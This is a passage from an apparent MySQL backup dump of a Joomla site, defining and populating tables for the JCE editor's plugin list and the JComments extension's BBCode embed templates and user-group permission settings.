_mce/plugins/spellchecker/dictionary.pws\nspellchecker_pspellshell_aspell=/usr/bin/aspell\nspellchecker_pspellshell_tmp=/tmp\n\n'),(2,'Front End','Sample Group for Authors, Editors, Publishers','','19,20,21','','6,7,8,9,10,13,14,15,16,17,18,19,27,28;20,21,25,26,30,31,35,42,43,44,46,47,49,50;24,32,38,39,41,45,48,51,52,53,54,56,57','6,20,21,49,50,1,3,5,38,39,41,48,51,52,53,54,56,57',0,2,0,'0000-00-00 00:00:00',''); /*!40000 ALTER TABLE `bak_fit_bss_jce_groups` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jce_plugins` -- DROP TABLE IF EXISTS `bak_fit_bss_jce_plugins`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jce_plugins` ( `id` int(11) NOT NULL auto_increment, `title` varchar(255) NOT NULL default '', `name` varchar(255) NOT NULL default '', `type` varchar(255) NOT NULL default '', `icon` varchar(255) NOT NULL default '', `layout` varchar(255) NOT NULL default '', `row` int(11) NOT NULL default '0', `ordering` int(11) NOT NULL default '0', `published` tinyint(3) NOT NULL default '0', `editable` tinyint(3) NOT NULL default '0', `iscore` tinyint(3) NOT NULL default '0', `elements` varchar(255) NOT NULL default '', `checked_out` int(11) NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=58 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jce_plugins` -- LOCK TABLES `bak_fit_bss_jce_plugins` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jce_plugins` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jce_plugins` VALUES (1,'Context Menu','contextmenu','plugin','','',0,0,1,0,1,'',0,'0000-00-00 00:00:00'),(2,'File Browser','browser','plugin','','',0,0,1,1,1,'',0,'0000-00-00 00:00:00'),(3,'Inline Popups','inlinepopups','plugin','','',0,0,1,0,1,'',0,'0000-00-00 00:00:00'),(4,'Media Support','media','plugin','','',0,0,1,1,1,'',0,'0000-00-00 00:00:00'),(5,'Safari Browser Support','safari','plugin','','',0,0,1,0,1,'',0,'0000-00-00 00:00:00'),(6,'Help','help','plugin','help','help',1,1,1,0,1,'',0,'0000-00-00 00:00:00'),(7,'New Document','newdocument','command','newdocument','newdocument',1,2,1,0,1,'',0,'0000-00-00 00:00:00'),(8,'Bold','bold','command','bold','bold',1,3,1,0,1,'',0,'0000-00-00 00:00:00'),(9,'Italic','italic','command','italic','italic',1,4,1,0,1,'',0,'0000-00-00 00:00:00'),(10,'Underline','underline','command','underline','underline',1,5,1,0,1,'',0,'0000-00-00 00:00:00'),(11,'Font Select','fontselect','command','fontselect','fontselect',1,6,1,0,1,'',0,'0000-00-00 00:00:00'),(12,'Font Size Select','fontsizeselect','command','fontsizeselect','fontsizeselect',1,7,1,0,1,'',0,'0000-00-00 00:00:00'),(13,'Style Select','styleselect','command','styleselect','styleselect',1,8,1,0,1,'',0,'0000-00-00 00:00:00'),(14,'StrikeThrough','strikethrough','command','strikethrough','strikethrough',1,9,1,0,1,'',0,'0000-00-00 00:00:00'),(15,'Justify Full','full','command','justifyfull','justifyfull',1,10,1,0,1,'',0,'0000-00-00 00:00:00'),(16,'Justify Center','center','command','justifycenter','justifycenter',1,11,1,0,1,'',0,'0000-00-00 00:00:00'),(17,'Justify Left','left','command','justifyleft','justifyleft',1,12,1,0,1,'',0,'0000-00-00 00:00:00'),(18,'Justify Right','right','command','justifyright','justifyright',1,13,1,0,1,'',0,'0000-00-00 00:00:00'),(19,'Format Select','formatselect','command','formatselect','formatselect',1,14,1,0,1,'',0,'0000-00-00 00:00:00'),(20,'Paste','paste','plugin','cut,copy,paste','paste',2,1,1,1,1,'',0,'0000-00-00 00:00:00'),(21,'Search Replace','searchreplace','plugin','search,replace','searchreplace',2,2,1,0,1,'',0,'0000-00-00 00:00:00'),(22,'Font ForeColour','forecolor','command','forecolor','forecolor',2,3,1,0,1,'',0,'0000-00-00 00:00:00'),(23,'Font BackColour','backcolor','command','backcolor','backcolor',2,4,1,0,1,'',0,'0000-00-00 00:00:00'),(24,'Unlink','unlink','command','unlink','unlink',2,5,1,0,1,'',0,'0000-00-00 00:00:00'),(25,'Indent','indent','command','indent','indent',2,6,1,0,1,'',0,'0000-00-00 00:00:00'),(26,'Outdent','outdent','command','outdent','outdent',2,7,1,0,1,'',0,'0000-00-00 00:00:00'),(27,'Undo','undo','command','undo','undo',2,8,1,0,1,'',0,'0000-00-00 00:00:00'),(28,'Redo','redo','command','redo','redo',2,9,1,0,1,'',0,'0000-00-00 00:00:00'),(29,'HTML','html','command','code','code',2,10,1,0,1,'',0,'0000-00-00 00:00:00'),(30,'Numbered List','numlist','command','numlist','numlist',2,11,1,0,1,'',0,'0000-00-00 00:00:00'),(31,'Bullet List','bullist','command','bullist','bullist',2,12,1,0,1,'',0,'0000-00-00 00:00:00'),(32,'Anchor','anchor','command','anchor','anchor',2,13,1,0,1,'',0,'0000-00-00 00:00:00'),(33,'Image','image','command','image','image',2,14,1,0,1,'',0,'0000-00-00 00:00:00'),(34,'Link','link','command','link','link',2,15,1,0,1,'',0,'0000-00-00 00:00:00'),(35,'Code Cleanup','cleanup','command','cleanup','cleanup',2,16,1,0,1,'',0,'0000-00-00 00:00:00'),(36,'Directionality','directionality','plugin','ltr,rtl','directionality',3,1,1,0,1,'',0,'0000-00-00 00:00:00'),(37,'Emotions','emotions','plugin','emotions','emotions',3,2,1,0,1,'',0,'0000-00-00 00:00:00'),(38,'Fullscreen','fullscreen','plugin','fullscreen','fullscreen',3,3,1,0,1,'',0,'0000-00-00 00:00:00'),(39,'Preview','preview','plugin','preview','preview',3,4,1,0,1,'',0,'0000-00-00 00:00:00'),(40,'Tables','table','plugin','tablecontrols','buttons',3,5,1,0,1,'',0,'0000-00-00 00:00:00'),(41,'Print','print','plugin','print','print',3,6,1,0,1,'',0,'0000-00-00 00:00:00'),(42,'Horizontal Rule','hr','command','hr','hr',3,7,1,0,1,'',0,'0000-00-00 00:00:00'),(43,'Subscript','sub','command','sub','sub',3,8,1,0,1,'',0,'0000-00-00 00:00:00'),(44,'Superscript','sup','command','sup','sup',3,9,1,0,1,'',0,'0000-00-00 00:00:00'),(45,'Visual Aid','visualaid','command','visualaid','visualaid',3,10,1,0,1,'',0,'0000-00-00 00:00:00'),(46,'Character Map','charmap','command','charmap','charmap',3,11,1,0,1,'',0,'0000-00-00 00:00:00'),(47,'Remove Format','removeformat','command','removeformat','removeformat',2,1,1,0,1,'',0,'0000-00-00 00:00:00'),(48,'Styles','style','plugin','styleprops','style',4,1,1,0,1,'',0,'0000-00-00 00:00:00'),(49,'Non-Breaking','nonbreaking','plugin','nonbreaking','nonbreaking',4,2,1,0,1,'',0,'0000-00-00 00:00:00'),(50,'Visual Characters','visualchars','plugin','visualchars','visualchars',4,3,1,0,1,'',0,'0000-00-00 00:00:00'),(51,'XHTML Xtras','xhtmlxtras','plugin','cite,abbr,acronym,del,ins,attribs','xhtmlxtras',4,4,1,0,1,'',0,'0000-00-00 00:00:00'),(52,'Image Manager','imgmanager','plugin','imgmanager','imgmanager',4,5,1,1,1,'',0,'0000-00-00 00:00:00'),(53,'Advanced Link','advlink','plugin','advlink','advlink',4,6,1,1,1,'',0,'0000-00-00 00:00:00'),(54,'Spell Checker','spellchecker','plugin','spellchecker','spellchecker',4,7,1,1,1,'',0,'0000-00-00 00:00:00'),(55,'Layers','layer','plugin','insertlayer,moveforward,movebackward,absolute','layer',4,8,1,0,1,'',0,'0000-00-00 00:00:00'),(56,'Advanced Code Editor','advcode','plugin','advcode','advcode',4,9,1,0,1,'',0,'0000-00-00 00:00:00'),(57,'Article Breaks','article','plugin','readmore,pagebreak','article',4,10,1,0,1,'',0,'0000-00-00 00:00:00'); /*!40000 ALTER TABLE `bak_fit_bss_jce_plugins` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jcomments` -- DROP TABLE IF EXISTS `bak_fit_bss_jcomments`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jcomments` ( `id` int(11) unsigned NOT NULL auto_increment, `parent` int(11) unsigned NOT NULL default '0', `path` varchar(255) NOT NULL default '', `level` tinyint(1) unsigned NOT NULL default '0', `object_id` int(11) unsigned NOT NULL default '0', `object_group` varchar(255) NOT NULL default '', `object_params` text NOT NULL, `lang` varchar(255) NOT NULL default '', `userid` int(11) unsigned NOT NULL default '0', `name` varchar(255) NOT NULL default '', `username` varchar(255) NOT NULL default '', `email` varchar(255) NOT NULL default '', `homepage` varchar(255) NOT NULL default '', `title` varchar(255) NOT NULL default '', `comment` text NOT NULL, `ip` varchar(15) NOT NULL default '', `date` datetime NOT NULL default '0000-00-00 00:00:00', `isgood` smallint(5) unsigned NOT NULL default '0', `ispoor` smallint(5) unsigned NOT NULL default '0', `published` tinyint(1) unsigned NOT NULL default '0', `subscribe` tinyint(1) unsigned NOT NULL default '0', `source` varchar(255) NOT NULL default '', `source_id` int(11) unsigned NOT NULL default '0', `checked_out` int(11) unsigned NOT NULL default '0', `checked_out_time` datetime NOT NULL default '0000-00-00 00:00:00', `editor` varchar(50) NOT NULL default '', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jcomments` -- LOCK TABLES `bak_fit_bss_jcomments` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jcomments` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_jcomments` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jcomments_custom_bbcodes` -- DROP TABLE IF EXISTS `bak_fit_bss_jcomments_custom_bbcodes`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jcomments_custom_bbcodes` ( `id` int(11) unsigned NOT NULL auto_increment, `name` varchar(64) NOT NULL default '', `simple_pattern` varchar(255) NOT NULL default '', `simple_replacement_html` text NOT NULL, `simple_replacement_text` text NOT NULL, `pattern` varchar(255) NOT NULL default '', `replacement_html` text NOT NULL, `replacement_text` text NOT NULL, `button_acl` text NOT NULL, `button_open_tag` varchar(16) NOT NULL default '', `button_close_tag` varchar(16) NOT NULL default '', `button_title` varchar(255) NOT NULL default '', `button_prompt` varchar(255) NOT NULL default '', `button_image` varchar(255) NOT NULL default '', `button_css` varchar(255) NOT NULL default '', `button_enabled` tinyint(1) unsigned NOT NULL default '0', `ordering` int(11) unsigned NOT NULL default '0', `published` tinyint(1) unsigned NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jcomments_custom_bbcodes` -- LOCK TABLES `bak_fit_bss_jcomments_custom_bbcodes` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jcomments_custom_bbcodes` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jcomments_custom_bbcodes` VALUES (1,'YouTube Video','[youtube]http://www.youtube.com/watch?v={IDENTIFIER}[/youtube]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.youtube.com/v/{IDENTIFIER}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.youtube.com/v/{IDENTIFIER}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.youtube.com/watch?v={IDENTIFIER}','\\[youtube\\]http\\:\\/\\/www\\.youtube\\.com\\/watch\\?v\\=([A-Za-z0-9-_]+)([A-Za-z0-9\\%\\&\\=\\#]*?)\\[\\/youtube\\]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.youtube.com/v/${1}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.youtube.com/v/${1}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.youtube.com/watch?v=${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss','[youtube]','[/youtube]','YouTube Video','','','bbcode-youtube',1,1,1),(2,'YouTube Video (short syntax)','[youtube]{IDENTIFIER}[/youtube]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.youtube.com/v/{IDENTIFIER}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.youtube.com/v/{IDENTIFIER}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.youtube.com/watch?v={IDENTIFIER}','\\[youtube\\]([A-Za-z0-9-_]+)([A-Za-z0-9\\%\\&\\=\\#]*?)\\[\\/youtube\\]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.youtube.com/v/${1}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.youtube.com/v/${1}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.youtube.com/watch?v=${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss','','','','','','',0,2,1),(3,'YouTube Video (full syntax)','[youtube]http://www.youtube.com/watch?v={IDENTIFIER}{TEXT}[/youtube]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.youtube.com/v/{IDENTIFIER}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.youtube.com/v/{IDENTIFIER}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.youtube.com/watch?v={IDENTIFIER}','\\[youtube\\]http\\:\\/\\/www\\.youtube\\.com\\/watch\\?v\\=([A-Za-z0-9-_]+)([\\w0-9-\\+\\=\\!\\?\\(\\)\\[\\]\\{\\}\\&\\%\\*\\#\\.,_ ]+)\\[\\/youtube\\]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.youtube.com/v/${1}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.youtube.com/v/${1}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.youtube.com/watch?v=${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss','[youtube]','[/youtube]','YouTube Video','','','',0,3,1),(4,'Google Video','[google]http://video.google.com/videoplay?docid={IDENTIFIER}[/google]','<embed style=\"width:425px; height:350px;\" id=\"VideoPlayback\" type=\"application/x-shockwave-flash\" src=\"http://video.google.com/googleplayer.swf?docId={IDENTIFIER}\" flashvars=\"\"></embed>','http://video.google.com/videoplay?docid={IDENTIFIER}','\\[google\\]http\\:\\/\\/video\\.google\\.com\\/videoplay\\?docid\\=([A-Za-z0-9-_]+)([A-Za-z0-9\\%\\&\\=\\#]*?)\\[\\/google\\]','<embed style=\"width:425px; height:350px;\" id=\"VideoPlayback\" type=\"application/x-shockwave-flash\" src=\"http://video.google.com/googleplayer.swf?docId=${1}\" flashvars=\"\"></embed>','http://video.google.com/videoplay?docid=${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss','[google]','[/google]','Google Video','','','bbcode-google',1,4,1),(5,'Google Video (short syntax)','[google]{IDENTIFIER}[/google]','<embed style=\"width:425px; height:350px;\" id=\"VideoPlayback\" type=\"application/x-shockwave-flash\" src=\"http://video.google.com/googleplayer.swf?docId={IDENTIFIER}\" flashvars=\"\"></embed>','http://video.google.com/videoplay?docid={IDENTIFIER}','\\[google\\]([A-Za-z0-9-_]+)([A-Za-z0-9\\%\\&\\=\\#]*?)\\[\\/google\\]','<embed style=\"width:425px; height:350px;\" id=\"VideoPlayback\" type=\"application/x-shockwave-flash\" src=\"http://video.google.com/googleplayer.swf?docId=${1}\" flashvars=\"\"></embed>','http://video.google.com/videoplay?docid=${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss','','','','','','',0,5,1),(6,'Google Video (alternate syntax)','[gv]http://video.google.com/videoplay?docid={IDENTIFIER}[/gv]','<embed style=\"width:425px; height:350px;\" id=\"VideoPlayback\" type=\"application/x-shockwave-flash\" src=\"http://video.google.com/googleplayer.swf?docId={IDENTIFIER}\" flashvars=\"\"></embed>','http://video.google.com/videoplay?docid={IDENTIFIER}','\\[gv\\]http\\:\\/\\/video\\.google\\.com\\/videoplay\\?docid\\=([A-Za-z0-9-_]+)([A-Za-z0-9\\%\\&\\=\\#]*?)\\[\\/gv\\]','<embed style=\"width:425px; height:350px;\" id=\"VideoPlayback\" type=\"application/x-shockwave-flash\" src=\"http://video.google.com/googleplayer.swf?docId=${1}\" flashvars=\"\"></embed>','http://video.google.com/videoplay?docid=${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss','','','','','','',0,6,1),(7,'Google Video (alternate syntax)','[googlevideo]http://video.google.com/videoplay?docid={IDENTIFIER}[/googlevideo]','<embed style=\"width:425px; height:350px;\" id=\"VideoPlayback\" type=\"application/x-shockwave-flash\" src=\"http://video.google.com/googleplayer.swf?docId={IDENTIFIER}\" flashvars=\"\"></embed>','http://video.google.com/videoplay?docid={IDENTIFIER}','\\[googlevideo\\]http\\:\\/\\/video\\.google\\.com\\/videoplay\\?docid\\=([A-Za-z0-9-_]+)([A-Za-z0-9\\%\\&\\=\\#]*?)\\[\\/googlevideo\\]','<embed style=\"width:425px; height:350px;\" id=\"VideoPlayback\" type=\"application/x-shockwave-flash\" src=\"http://video.google.com/googleplayer.swf?docId=${1}\" flashvars=\"\"></embed>','http://video.google.com/videoplay?docid=${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss','','','','','','',0,7,1),(8,'Facebook Video','[fv]http://www.facebook.com/video/video.php?v={IDENTIFIER}[/fv]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.facebook.com/v/{IDENTIFIER}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.facebook.com/v/{IDENTIFIER}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.facebook.com/video/video.php?v={IDENTIFIER}','\\[fv\\]http\\:\\/\\/www\\.facebook\\.com\\/video\\/video\\.php\\?v\\=([A-Za-z0-9-_]+)([A-Za-z0-9\\%\\&\\=\\#]*?)\\[\\/fv\\]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.facebook.com/v/${1}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.facebook.com/v/${1}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.facebook.com/video/video.php?v=${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss','[fv]','[/fv]','Facebook Video','','','bbcode-facebook',1,8,1),(9,'Facebook Video (short syntax)','[fv]{IDENTIFIER}[/fv]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.facebook.com/v/{IDENTIFIER}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.facebook.com/v/{IDENTIFIER}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.facebook.com/video/video.php?v={IDENTIFIER}','\\[fv\\]([A-Za-z0-9-_]+)([A-Za-z0-9\\%\\&\\=\\#]*?)\\[\\/fv\\]','<object width=\"425\" height=\"350\"><param name=\"movie\" value=\"http://www.facebook.com/v/${1}\"></param><param name=\"wmode\" value=\"transparent\"></param><embed src=\"http://www.facebook.com/v/${1}\" type=\"application/x-shockwave-flash\" wmode=\"transparent\" width=\"425\" height=\"350\"></embed></object>','http://www.facebook.com/video/video.php?v=${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss','','','','','','',0,9,1),(10,'Wiki','[wiki]{SIMPLETEXT}[/wiki]','<a href=\"http://www.wikipedia.org/wiki/{SIMPLETEXT}\" title=\"{SIMPLETEXT}\" target=\"_blank\">{SIMPLETEXT}</a>','{SIMPLETEXT}','\\[wiki\\]([A-Za-z0-9\\-\\+\\.,_ ]+)\\[\\/wiki\\]','<a href=\"http://www.wikipedia.org/wiki/${1}\" title=\"${1}\" target=\"_blank\">${1}</a>','${1}','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss','[wiki]','[/wiki]','Wikipedia','','','bbcode-wiki',1,10,1); /*!40000 ALTER TABLE `bak_fit_bss_jcomments_custom_bbcodes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jcomments_reports` -- DROP TABLE IF EXISTS `bak_fit_bss_jcomments_reports`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jcomments_reports` ( `id` int(11) unsigned NOT NULL auto_increment, `commentid` int(11) unsigned NOT NULL default '0', `userid` int(11) unsigned NOT NULL default '0', `name` varchar(255) NOT NULL default '', `ip` varchar(15) NOT NULL default '', `date` datetime NOT NULL default '0000-00-00 00:00:00', `reason` tinytext NOT NULL, `status` tinyint(1) unsigned NOT NULL default '0', PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jcomments_reports` -- LOCK TABLES `bak_fit_bss_jcomments_reports` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jcomments_reports` DISABLE KEYS */; /*!40000 ALTER TABLE `bak_fit_bss_jcomments_reports` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `bak_fit_bss_jcomments_settings` -- DROP TABLE IF EXISTS `bak_fit_bss_jcomments_settings`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `bak_fit_bss_jcomments_settings` ( `component` varchar(50) NOT NULL default '', `lang` varchar(20) NOT NULL default '', `name` varchar(50) NOT NULL default '', `value` text NOT NULL, PRIMARY KEY (`component`,`lang`,`name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `bak_fit_bss_jcomments_settings` -- LOCK TABLES `bak_fit_bss_jcomments_settings` WRITE; /*!40000 ALTER TABLE `bak_fit_bss_jcomments_settings` DISABLE KEYS */; INSERT INTO `bak_fit_bss_jcomments_settings` VALUES ('','','enable_username_check','1'),('','','username_maxlength','20'),('','','forbidden_names','adminbss,moderator'),('','','author_email','2'),('','','author_homepage','1'),('','','comment_maxlength','1000'),('','','comment_minlength','0'),('','','word_maxlength','15'),('','','link_maxlength','30'),('','','flood_time','30'),('','','enable_notification','0'),('','','notification_email',''),('','','template','default'),('','','enable_smiles','1'),('','','comments_per_page','10'),('','','comments_page_limit','15'),('','','comments_pagination','both'),('','','comments_order','DESC'),('','','show_commentlength','1'),('','','enable_nested_quotes','1'),('','','enable_rss','1'),('','','censor_replace_word','[censored]'),('','','can_comment','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','can_reply','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','show_policy','Unregistered,Registered'),('','','enable_captcha','Unregistered'),('','','floodprotection','Unregistered,Registered,Author,Editor'),('','','enable_comment_length_check','Unregistered,Registered'),('','','autopublish','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','autolinkurls','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_subscribe','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_gravatar',''),('','','can_view_homepage','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','can_publish','Publisher,Manager,Adminbss,Super Adminbss'),('','','can_view_email','Manager,Adminbss,Super Adminbss'),('','','can_edit','Manager,Adminbss,Super Adminbss'),('','','can_edit_own','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','can_delete','Manager,Adminbss,Super Adminbss'),('','','can_delete_own','Manager,Adminbss,Super Adminbss'),('','','enable_bbcode_b','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_bbcode_i','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_bbcode_u','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_bbcode_s','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_bbcode_url','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_bbcode_img','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_bbcode_list','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_bbcode_hide','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','can_view_ip','Adminbss,Super Adminbss'),('','','enable_categories',''),('','','emailprotection','Unregistered'),('','','enable_comment_maxlength_check',''),('','','enable_autocensor','Unregistered'),('','','badwords',''),('','','smiles',':D laugh.gif\n:lol: lol.gif\n:-) smile.gif\n;-) wink.gif\n8) cool.gif\n:-| normal.gif\n:-* whistling.gif\n:oops: redface.gif\n:sad: sad.gif\n:cry: cry.gif\n:o surprised.gif\n:-? confused.gif\n:-x sick.gif\n:eek: shocked.gif\n:zzz sleeping.gif\n:P tongue.gif\n:roll: rolleyes.gif\n:sigh: unsure.gif'),('','','enable_mambots','1'),('','','form_show','1'),('','','display_author','name'),('','','enable_voting','1'),('','','can_vote','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','merge_time','0'),('','','template_view','list'),('','','message_policy_post',''),('','','message_policy_whocancomment',''),('','','message_locked','This content has been locked. You can no longer post any comment.'),('','','comment_title','0'),('','','enable_custom_bbcode','0'),('','','enable_bbcode_quote','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_bbcode_code','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_geshi','0'),('','','can_report','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','','enable_quick_moderation','0'),('','','notification_type','1,2'),('','','captcha_engine','kcaptcha'),('','en-GB','enable_notification','0'),('','en-GB','notification_type','1,2'),('','en-GB','notification_email',''),('','en-GB','enable_quick_moderation','0'),('','en-GB','enable_rss','1'),('','en-GB','enable_mambots','1'),('','en-GB','template','default'),('','en-GB','enable_smiles','1'),('','en-GB','enable_custom_bbcode','0'),('','en-GB','enable_voting','1'),('','en-GB','display_author','name'),('','en-GB','template_view','list'),('','en-GB','comments_order','DESC'),('','en-GB','comments_per_page','10'),('','en-GB','comments_page_limit','15'),('','en-GB','comments_pagination','both'),('','en-GB','form_show','1'),('','en-GB','author_email','0'),('','en-GB','author_homepage','0'),('','en-GB','comment_title','0'),('','en-GB','captcha_engine','kcaptcha'),('','en-GB','can_comment','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','can_reply','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','show_policy','Registered'),('','en-GB','floodprotection','Unregistered,Registered,Author,Editor'),('','en-GB','enable_comment_length_check','Unregistered,Registered'),('','en-GB','enable_autocensor','Unregistered'),('','en-GB','enable_bbcode_quote','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','can_vote','Unregistered,Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','autopublish','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','enable_subscribe','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','enable_bbcode_b','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','enable_bbcode_i','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','enable_bbcode_u','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','enable_bbcode_s','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','enable_bbcode_url','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','enable_bbcode_img','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','enable_bbcode_list','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','enable_bbcode_hide','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','autolinkurls','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','can_view_homepage','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','can_edit_own','Registered,Author,Editor,Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','can_publish','Publisher,Manager,Adminbss,Super Adminbss'),('','en-GB','can_view_email','Manager,Adminbss,Super Adminbss'),('','en-GB','can_delete_own','Manager,Adminbss,Super Adminbss'),('','en-GB','can_edit','Manager,Adminbss,Super Adminbss'),('','en-GB','can_delete','Manager,Adminbss,Super Adminbss'),('','en-GB','can_view_ip','Adminbss,Super 